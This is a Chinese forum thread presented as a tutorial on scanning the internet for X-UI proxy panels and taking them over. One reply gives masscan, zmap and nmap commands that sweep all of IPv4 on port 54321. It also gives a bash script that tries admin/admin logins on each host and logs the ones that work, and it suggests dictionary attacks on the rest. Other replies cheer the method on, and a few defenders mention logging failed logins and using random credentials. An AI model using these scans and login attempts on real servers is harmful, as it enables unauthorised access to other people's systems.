扫描XUI到提取代理链接 全教程

共计 2080 个字符，预计需要花费 6 分钟才能阅读完成。

网友回复：

注册 ： https://github.com/FranzKafkaYu/x-ui，你们喜欢扫，我就来让你们扫，登录失败会记录 IP，直接举报 abuse.

silence： 安装 debian 下都可以一键安装 apt install -y nmap zmap masscan 粗扫 先用这些软件进行端口粗扫，用哪个都行 masscan masscan 0.0.0.0/0 -p54321 –banners –exclude 255.255.255.255 -oJ scan.json zmap zmap –target-port=54321 –output-file=scan.log nmap nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log 弱口令尝试 早年一些某 ui 的一键安装脚本采用 admin/admin 的弱密码，很多人都懒得改，因此可以针对开放默认端口 54321 的服务器逐一尝试登录 #!/bin/bash for ip_ad in $(sed -nE  ‘s/.*”ip”: “([^”]+)”.*/1/p’ scan.json); do         if curl –max-time 1 http://$ip_ad:54321; then                 res=$(curl “http://${ip_ad}:54321/login”  –data-raw ‘username=admin&password=admin’ –compressed  –insecure)                 if [[“$res” =~ .*true.*]]; then                         echo $ip_ad | tee >> week.log                 fi                 echo $ip_ad | tee >> all.log         fi done; week.log 里面就是所有扫出来的可以弱口令登录的机器，挺容易扫出来的 all.log 是改了密码的机器，有兴趣可以尝试进一步字典枚举

FranzkafkaYu： https://www.nodeseek.com/post-1084-1 教程我之前出过的，没藏着掖着 不知道 shodan 收录的完整性如何，我是直接把全球 ipv4 的 54321 端口扫了一遍

898198： 技术贴，厉害了。帮顶一下。

898198： 字典爆破？

惜为伊人醉 ： 默认密码的总共就那些，再扫也扫不出来了

imgood： 默认密码 admin/admin 扫一下就够了，没必要专门去爆破

菊花帅比 ： 技术贴，帮顶一下。

silence： v2fly 或者 xray 就一个 config 文件，搞不懂为什么要 UI。。

vlin： 我去年扫到现在了，越来越多。。。

注册 ： 又学到了，但太多鸡鸡代理吃灰，机场也还有几年。。

注册 ： 已阅

jzelynn： 自己没鸡吗，流量根本用不完

b66667777： https://hostloc.com/forum.php?mod=viewthread&tid=1137104 主要是怼这个

gajiodgaj： 改端口的扫不了吧？

silence： 我没有针对端口扫，是用的 shodan 的收录，改端口的也是有收录的

交配交的人 ： 分享一下订阅呗

silence： 感谢大佬分享

CharmingYi： https://github.com/FranzKafkaYu/x-ui，你们喜欢扫，我就来让你们扫，登录失败会记录 IP，直接举报 abuse.

蛋饼 ： 随机用户名 + 随机密码 + 随机端口 + 随机根路径，欢迎你们来扫。

注册 ： 早晚会有这一天

注册 ： 好贴顶了